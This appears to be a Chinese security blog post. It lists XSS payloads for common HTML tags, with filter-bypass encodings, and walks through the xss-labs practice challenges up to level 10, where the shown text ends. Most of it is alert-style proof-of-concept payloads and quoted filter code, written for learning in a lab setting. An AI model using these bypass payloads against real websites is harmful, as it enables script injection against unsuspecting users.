<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web,">










<meta name="description" content="0x00常见的标签利用">
<meta name="keywords" content="web">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS中常见标签利用以及XSS-labs通关攻略">
<meta property="og:url" content="https://Horizoncy.github.io/2020/07/30/XSS中常见标签利用以及XSS-labs通关攻略/index.html">
<meta property="og:site_name" content="Horizon&#39;s Security Notes">
<meta property="og:description" content="0x00常见的标签利用">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2020-08-02T15:46:01.807Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS中常见标签利用以及XSS-labs通关攻略">
<meta name="twitter:description" content="0x00常见的标签利用">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://Horizoncy.github.io/2020/07/30/XSS中常见标签利用以及XSS-labs通关攻略/">





  <title>XSS中常见标签利用以及XSS-labs通关攻略 | Horizon's Security Notes</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Horizon's Security Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">With great power comes great responsibility.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://Horizoncy.github.io/2020/07/30/XSS中常见标签利用以及XSS-labs通关攻略/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Horizon">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Horizon's Security Notes">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS中常见标签利用以及XSS-labs通关攻略</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-07-30T12:03:20+08:00">
                2020-07-30
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.4k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  17
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0x00常见的标签利用"><a href="#0x00常见的标签利用" class="headerlink" title="0x00常见的标签利用"></a>0x00常见的标签利用</h1><a id="more"></a>
<h2 id="60-img-62-标签"><a href="#60-img-62-标签" class="headerlink" title="&#60;img&#62; 标签"></a>&#60;img&#62; 标签</h2><h3 id="XSS利用-1"><a href="#XSS利用-1" class="headerlink" title="XSS利用 1"></a>XSS利用 1</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=javascript:alert(&apos;xss&apos;)&gt;   //版本，E7.0|IE6.0，才能执行 </span><br><span class="line">&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;  //版本，E7.0|IE6.0，才能执行 </span><br><span class="line">&lt;img src=&quot;URL&quot; style=&apos;Xss:expression(alert(/xss/));&apos;&gt;  //版本，E7.0|IE6.0，才能执行 </span><br><span class="line">CSS标记XSS</span><br><span class="line">&lt;img STYLE=&quot;background-image:url(javascript:alert(&apos;XSS&apos;))&quot;&gt;  //版本，E7.0|IE6.0，才能执行 </span><br><span class="line">CSS样式表的标记进行XSS转码</span><br><span class="line">&lt;img STYLE=&quot;background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29&quot;&gt;   //版本，E7.0|IE6.0，才能执行</span><br></pre></td></tr></table></figure>

<h3 id="XSS利用2："><a href="#XSS利用2：" class="headerlink" title="XSS利用2："></a>XSS利用2：</h3><p>html编码: </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt; //可以不加&quot;和; </span><br><span class="line">原code:</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;alert(1)&quot;&gt; </span><br><span class="line">16进制编码ASCII: &lt;img src=&quot;1&quot; onerror=eval(&quot;\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29&quot;)&gt;&lt;/img&gt;  //必须要有双引号，不然执行不了 </span><br><span class="line">原code:</span><br><span class="line">&lt;img src=&quot;1&quot; onerror=eval(&quot;alert(&apos;xss&apos;)&quot;)&gt;&lt;/img&gt; //可以去掉双引号</span><br></pre></td></tr></table></figure>

<h3 id="XSS利用3："><a href="#XSS利用3：" class="headerlink" title="XSS利用3："></a>XSS利用3：</h3><p>错误事件: </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=1 onerror=alert(&apos;xss&apos;)&gt; </span><br><span class="line">鼠标在其上事件: &lt;img src=1 onmouseover=alert(&apos;xss&apos;) type=&quot;text&quot; &gt;</span><br></pre></td></tr></table></figure>

<h2 id="60-a-62-标签"><a href="#60-a-62-标签" class="headerlink" title="&#60;a&#62; 标签"></a>&#60;a&#62; 标签</h2><h3 id="标准格式："><a href="#标准格式：" class="headerlink" title="标准格式："></a>标准格式：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;http://www.baidu.com&quot;&gt;  baidu  &lt;/a&gt;</span><br></pre></td></tr></table></figure>

<h3 id="XSS利用1："><a href="#XSS利用1：" class="headerlink" title="XSS利用1："></a>XSS利用1：</h3><p>编码后： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;a   href=javascript:eval(&quot;\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29&quot;)&gt;2&lt;/a&gt;   //不能去掉双引号 </span><br><span class="line">&lt;a href=javascript:eval(&quot; &amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#120;&amp;#115;&amp;#115;&amp;#39;&amp;#41; &quot;)&gt;2&lt;/a&gt;  //可以去掉双引号 </span><br><span class="line">原code：</span><br><span class="line">&lt;a href=javascript:eval(&quot;alert(&apos;xss&apos;)&quot;)&gt;2&lt;/a &gt;</span><br></pre></td></tr></table></figure>

<p> 编码后： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#34;&amp;#120;&amp;#115;&amp;#115;&amp;#34;&amp;#41;&quot;&gt;2&lt;/a&gt; </span><br><span class="line">&lt;a href=&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116&amp;#40&amp;#47&amp;#120&amp;#115&amp;#115&amp;#47&amp;#41&gt;XSStest&lt;/a&gt; </span><br><span class="line">原code：</span><br><span class="line">&lt;a href=&quot;javascript:alert(&apos;xss&apos;)&quot;&gt;2&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<h3 id="XSS-利用2："><a href="#XSS-利用2：" class="headerlink" title="XSS 利用2："></a>XSS 利用2：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;data:text/html;base64, PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==&quot;&gt;test&lt;/a&gt; //base64编码，在谷歌浏览器可以成功解析 ：&lt;img src=x onerror=alert(1)&gt;  &lt;a href=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=&quot;&gt;test&lt;/a&gt; </span><br><span class="line">// PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=            // &lt;script&gt;alert(&apos;xss&apos;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="XSS利用3：-1"><a href="#XSS利用3：-1" class="headerlink" title="XSS利用3："></a>XSS利用3：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&quot; onclick=&quot;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt;aaaaa&lt;/a&gt;   //可以去掉双引号和； </span><br><span class="line">原code:</span><br><span class="line">&lt;a href=&quot;&quot; onclick=&quot;alert(1)&quot;&gt;aaaaa&lt;/a&gt; </span><br><span class="line">js以及html编码后： &lt;a href=&quot;&quot;onclick=eval(&quot;\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29&quot;)&gt;aaaaa&lt;/a&gt; </span><br><span class="line">&lt;a href=&quot;&quot; onclick=eval(&apos;\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29&apos;)&gt;aaaaa&lt;/a&gt;   //单引号和双引号都可以 </span><br><span class="line">&lt;a href=&quot;&quot; onclick=eval(&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116&amp;#40&amp;#39&amp;#120&amp;#115&amp;#115&amp;#39&amp;#41)&gt;aaaaa&lt;/a&gt;  //可以成功弹窗，如果在url地址栏输入的时候，要进行urlenode编码 </span><br><span class="line">原code：</span><br><span class="line">eval(&quot;alert(&apos;xss&apos;)&quot;)  &lt;a href=&quot;#&quot; onclick=alert(‘\170\163\163’)&gt;test3&lt;/a&gt;  //可以成功执行 </span><br><span class="line">原code：</span><br><span class="line">&lt;a href=&quot;#&quot; onclick=alert(&apos;xss&apos;)&gt;test3&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<h3 id="XSS利用4："><a href="#XSS利用4：" class="headerlink" title="XSS利用4："></a>XSS利用4：</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=kycg.asp?ttt=1000 onmouseover=prompt(123) y=2016&gt;2&lt;/a&gt;   //可以实现弹窗</span><br></pre></td></tr></table></figure>

<h2 id="60-input-62-标签"><a href="#60-input-62-标签" class="headerlink" title="&#60;input&#62; 标签"></a>&#60;input&#62; 标签</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">一般格式：</span><br><span class="line">&lt;INPUT name=&quot;name&quot; value=&quot;&quot;&gt; </span><br><span class="line">事件弹窗: &lt;input value=&quot;&quot; onclick=&quot;alert(11)&quot; type=&quot;text&quot;&gt; </span><br><span class="line">&lt;INPUT name=&quot;name&quot; value=&quot;01/01/1967&quot; onmouseover=prompt(971874) bad=&quot;&quot;&gt; </span><br><span class="line">script弹窗: &lt;INPUT name=&quot;name&quot; value=&quot;&quot;&gt;&lt;script&gt;alert(123)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h2 id="小技巧："><a href="#小技巧：" class="headerlink" title="小技巧："></a>小技巧：</h2><h3 id="当XSS遇到input-hidden属性"><a href="#当XSS遇到input-hidden属性" class="headerlink" title="当XSS遇到input hidden属性"></a>当XSS遇到input hidden属性</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1、使用expression突破</span><br><span class="line">&lt;input type=hidden style=`x:expression(alert(/xss/))`&gt; </span><br><span class="line">直接利用CSS的expression属性来实现突破，此技巧适用于IE6及以下的浏览器。</span><br><span class="line">2​、使用accesskey突破</span><br><span class="line">&lt;input type=&quot;hidden&quot; accesskey=&quot;X&quot; onclick=&quot;alert(/xss/)&quot;&gt; </span><br><span class="line">插入之后， 火狐 使用ALT+SHIFT+X快捷键来触发XSS， Chrome使用ALT+X触发 。</span><br><span class="line">类似这种span标签在网页无触发点，也可以这样子用。</span><br><span class="line">&lt;span id=&quot;span&quot;  recieveurl=&apos;xxxeId=1&apos; accesskey=&apos;X&apos; onclick=&apos;alert(/xss/)&apos; bad=&apos;&apos;&gt;&lt;/span&gt;</span><br></pre></td></tr></table></figure>

<h3 id="60-form-62-标签"><a href="#60-form-62-标签" class="headerlink" title="&#60;form&#62; 标签"></a>&#60;form&#62; 标签</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method=Post action=kycg.asp?ttt=1000 onmouseover=prompt(962613) y=&amp;enddate=2016 &gt; #action后面直接空格 </span><br><span class="line">&lt;input type=&apos;text&apos; name=&apos;page&apos; value=0&gt; </span><br><span class="line">&lt;input name=&apos;submit&apos; type=&apos;submit&apos; value=&apos;GO&apos; class=&quot;input2&quot;&gt; </span><br><span class="line">&lt;/form&gt;  &lt;form method=Post action=javascript:alert(&apos;xss&apos;) &gt; </span><br><span class="line">&lt;input type=&apos;text&apos; name=&apos;page&apos; value=0&gt; </span><br><span class="line">&lt;input name=&apos;submit&apos; type=&apos;submit&apos; value=&apos;GO&apos; class=&quot;input2&quot;&gt; </span><br><span class="line">&lt;/form&gt;  &lt;form method=Post action=1 onmouseover=alert(123) bbb=111 &gt; </span><br><span class="line">&lt;input type=&apos;text&apos; name=&apos;page&apos; value=0&gt; </span><br><span class="line">&lt;input name=&apos;submit&apos; type=&apos;submit&apos; value=&apos;GO&apos; class=&quot;input2&quot;&gt; </span><br><span class="line">&lt;/form&gt;   </span><br><span class="line">&lt;form method=Post action=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=&quot;&gt; </span><br><span class="line">&lt;input type=&apos;text&apos; name=&apos;page&apos; value=0&gt; </span><br><span class="line">&lt;input name=&apos;submit&apos; type=&apos;submit&apos; value=&apos;GO&apos; class=&quot;input2&quot;&gt; </span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<h3 id="60-iframe-62-标签"><a href="#60-iframe-62-标签" class="headerlink" title="&#60;iframe&#62; 标签"></a>&#60;iframe&#62; 标签</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=javascript:alert(&apos;xss&apos;);height=0 width=0 /&gt;&lt;iframe&gt;  &lt;iframe src=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=&quot;&gt; </span><br><span class="line">&lt;iframe src=&quot;data:text/html,&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&quot;&gt;&lt;/iframe&gt;     //谷歌浏览器下实现弹窗  &lt;iframe src=1 onmouseover=alert(&apos;xss&apos;) y=2016 /&gt;&lt;iframe&gt;  &lt;iframe src=&quot;javascript&amp;colon;prompt&amp;lpar;`xss`&amp;rpar;;&quot; frameborder=&quot;0&quot; width=&quot;100%&quot; height=&quot;1120px&quot;&gt;&lt;/iframe&gt; //遇到的有点特别  &lt;iframe src=&quot;vbscript:msgbox(123)&quot;&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<h1 id="0x01-xss-labs-通关攻略"><a href="#0x01-xss-labs-通关攻略" class="headerlink" title="0x01 xss-labs 通关攻略"></a>0x01 xss-labs 通关攻略</h1><h2 id="level-1"><a href="#level-1" class="headerlink" title="level-1"></a>level-1</h2><p>最简单的反射型xss，直接给name传参 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload: &lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h2 id="level-2"><a href="#level-2" class="headerlink" title="level-2"></a>level-2</h2><p>有一个搜索框，搜索框内的内容可以显示到页面上。直接搜索:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>可以看到并没有执行，但是会出现在页面上。<br>此时F12查看网站源代码，可以看到定位在：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;input name=&quot;keyword&quot; value=&quot;&lt;script&gt;alert(1)&lt;/script&gt;&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>这里需要闭合”以及&#60;&#62;。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;&quot;</span><br></pre></td></tr></table></figure>

<h2 id="level-3"><a href="#level-3" class="headerlink" title="level-3"></a>level-3</h2><p>一开始还是想用和第二关一样的方法，闭合掉前面是value，但是发现死活闭合不了。<br>去看了php源码，所有的地方都被htmlspecialchars函数过滤了，该函数可以过滤”&lt;””&gt;””” “，但是不会过滤单引号，而且value的闭合也是采用单引号，所以会有xss漏洞：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"> echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&quot;&lt;center&gt; </span><br><span class="line">&lt;form action=level3.php method=GET&gt; </span><br><span class="line">&lt;input name=keyword  value=&apos;&quot;.htmlspecialchars($str).&quot;&apos;&gt;</span><br></pre></td></tr></table></figure>

<p>所以考虑使用事件，并且闭合掉前面的’。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：&apos; onclick=&apos;alert(1)。</span><br></pre></td></tr></table></figure>

<h2 id="level-4"><a href="#level-4" class="headerlink" title="level-4"></a>level-4</h2><p>首先常规的输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>发现把&#60;&#62;接过滤掉了，尝试双写，依然被过滤掉。<br>只能使用事件进行注入，value的闭合使用的是单引号。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：&quot; onclick=&quot;alert(1)</span><br></pre></td></tr></table></figure>

<h2 id="level-5"><a href="#level-5" class="headerlink" title="level-5"></a>level-5</h2><p>先常规的输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>发现变成了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scr_ipt&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>尝试大写绕过，无果。<br>那么使用事件吧，输入：onclick =alert(1)，发现也变成了：o_nclick =alert(1)。<br>那么事件和script都用不了了。<br>使用跳转并没有被过滤。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：&quot;&gt;&lt;a href=&quot;javascript:alert(1)&quot;</span><br></pre></td></tr></table></figure>

<h2 id="level-6"><a href="#level-6" class="headerlink" title="level-6"></a>level-6</h2><p>和上题差不多，只不过把href也一起加了_。<br>不过没有过滤大小写，按前面几关的改大写的payload即可。</p>
<h2 id="level-7"><a href="#level-7" class="headerlink" title="level-7"></a>level-7</h2><p>这次是直接全部过滤掉了。大写后全部替换为小写。不过测试后发现只去掉一次，可以使用之前的双写payload。</p>
<h2 id="level-8"><a href="#level-8" class="headerlink" title="level-8"></a>level-8</h2><p>首先输入：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>找插入点，发现直接插在了一个href里面，那么直接输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(1)</span><br></pre></td></tr></table></figure>

<p>但是发现被过滤了，变成了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascr_ipt:alert(1)&quot;&gt;友情链接&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<pre><code>看一下源码，发现很多都被过滤了：</code></pre><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$str = strtolower($_GET[&quot;keyword&quot;]); </span><br><span class="line">$str2=str_replace(&quot;script&quot;,&quot;scr_ipt&quot;,$str); </span><br><span class="line">$str3=str_replace(&quot;on&quot;,&quot;o_n&quot;,$str2); </span><br><span class="line">$str4=str_replace(&quot;src&quot;,&quot;sr_c&quot;,$str3); </span><br><span class="line">$str5=str_replace(&quot;data&quot;,&quot;da_ta&quot;,$str4); </span><br><span class="line">$str6=str_replace(&quot;href&quot;,&quot;hr_ef&quot;,$str5); </span><br><span class="line">$str7=str_replace(&apos;&quot;&apos;,&apos;&amp;quot&apos;,$str6);</span><br></pre></td></tr></table></figure>

<p>解决办法是使用html实体编码 : </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：java&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;:alert(1)</span><br></pre></td></tr></table></figure>

<h2 id="level-9"><a href="#level-9" class="headerlink" title="level-9"></a>level-9</h2><p>这里发现怎么输入链接都是非法的，审计php源码可以看到：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(false===strpos($str7,&apos;http://&apos;))</span><br></pre></td></tr></table></figure>

<p>其他的过滤都和上一关一样，所以提交的字符串必须要有http://。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：java&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;:alert(&apos;http://www.baidu.com&apos;)</span><br></pre></td></tr></table></figure>

<h2 id="level-10"><a href="#level-10" class="headerlink" title="level-10"></a>level-10</h2><p>经过测试，这里的keyword不再回显到页面上，阅读源码： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$str11 = $_GET[&quot;t_sort&quot;]; </span><br><span class="line">$str22=str_replace(&quot;&gt;&quot;,&quot;&quot;,$str11); </span><br><span class="line">$str33=str_replace(&quot;&lt;&quot;,&quot;&quot;,$str22); </span><br><span class="line">echo &quot;&lt;h2 align=center&gt;没有找到和&quot;.htmlspecialchars($str).&quot;相关的结果.&lt;/h2&gt;&quot;.&apos;&lt;center&gt; </span><br><span class="line">&lt;form id=search&gt; </span><br><span class="line">&lt;input name=&quot;t_link&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt; </span><br><span class="line">&lt;input name=&quot;t_history&quot;  value=&quot;&apos;.&apos;&quot; type=&quot;hidden&quot;&gt; </span><br><span class="line">&lt;input name=&quot;t_sort&quot;  value=&quot;&apos;.$str33.&apos;&quot; type=&quot;hidden&quot;&gt;</span><br></pre></td></tr></table></figure>

